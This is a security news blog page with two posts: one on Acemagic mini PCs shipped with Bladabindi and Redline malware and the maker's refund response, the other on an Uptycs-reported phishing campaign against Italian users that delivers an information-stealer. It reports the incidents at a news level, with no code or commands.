Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Info-Stealer. Show all posts

This Chinese PC Manufacturer Tailored its Own Devices to be Susceptible to Malware

 

Acemagic, a Chinese manufacturer of personal computers, has acknowledged that certain products were shipped with pre-installed malware.

The discovery was made by a YouTuber known as The Net Guy, who encountered malware on Acemagic mini PCs during testing in early February. The malware, identified as Bladabindi, was detected by Windows Defender shortly after booting the machine. Bladabindi is a well-known backdoor that can steal user information and facilitate the installation of other malicious software.

Recently, Acemagic confirmed that some of its PCs were indeed infected with Bladabindi and also raised concerns about the potential presence of another malware called Redline. Redline is capable of stealing information from web browsers, conducting system inventories, and even pilfering cryptocurrency.

Acemagic's explanation for the malware's presence was somewhat perplexing and inconsistent. Initially, the company attributed the issue to adjustments made by software developers to enhance user experience by reducing boot time, which inadvertently affected network settings and omitted digital signatures. However, in a subsequent statement to The Register, the company mentioned that the incident stemmed from similar software adjustments made by developers.

The company has pledged to bolster its use of digital certificates to prevent unauthorized modifications, hinting that external parties might have accessed its machines or its master copy of Windows to deliver the malware.

It remains uncertain whether the infections occurred at the factory or after the PCs were in the possession of their new owners. Acemagic has announced plans to refund the cost of machines manufactured between September and November 2023 and has advised owners to check the stickers affixed to their models for the date of manufacture.

Interestingly, just before The Register received Acemagic's acknowledgment of the malware issue, they received a review unit of one of its PCs. However, the labels on that unit did not contain information about the date of manufacture, nor did the QR codes provide such details.

Acemagic has provided clean system images for owners to disinfect their machines and is offering a 25 percent purchase price rebate for those who do so. Additionally, owners of infected machines can apply for a voucher providing a ten percent discount on any future Acemagic purchase, though it remains to be seen if customers will trust the brand after this incident.

Italian Users Warned of New Info-Stealer Malware Campaign


The Uptycs Threat research team has revealed a new malware campaign, targeting Italy with phishing attacks in order to deploy information-stealing malware on victims’ compromised Windows systems. 

According to Uptycs security researcher Karthickkumar Kathiresan, the malware campaign is designed to acquire sensitive information like system details, cryptocurrency wallet information, browser histories, cookies, and login credentials of crypto wallets. 

Details of the Campaign 

  • The multiple-stage infection sequence begins with an invoice-themed phishing email that comprises a link that downloads a password-protected ZIP archive file containing two files: A shortcut (.LNK) file and a batch (.BAT) file. 
  • Irrespective of what file has been deployed, the attack chain remains the same, fetching a batch script that installs an information-stealing payload from a GitHub repository. This is achieved by utilizing a legitimate PowerShell binary that as well is retrieved from GitHub. 
  • After being installed, the C#-based malware gathers system metadata and information from a variety of web browsers and cryptocurrency wallets, and then it transfers that data to a domain that is under the authority of an actor. 

Info-stealers You Should Beware of

Vidar stealer: It resurfaced with certain sophisticated tactics in order to exploit popular social media platforms such as Telegram, Mastodon, TikTok, and Steam. Back in December 2022, numerous information stealers were discovered targeting the PyPI repository. It was discovered that 16 packages, each of which had been downloaded more than 100 times, were being used to distribute ten different stealer variants. 

In today’s world of cybercrime, which is constantly evolving, one of the most severe forms of malware that one must beware of is the info-stealer. This covert digital burglar may sneak into your devices and networks to steal sensitive information, consequently rendering you vulnerable to identity theft, financial fraud, or more devastating repercussions. 

In order to protect oneself from malware attacks like info-stealer, it is advised by Uptycs to update passwords regularly and employ robust security controls with multi-layered visibility and security solutions.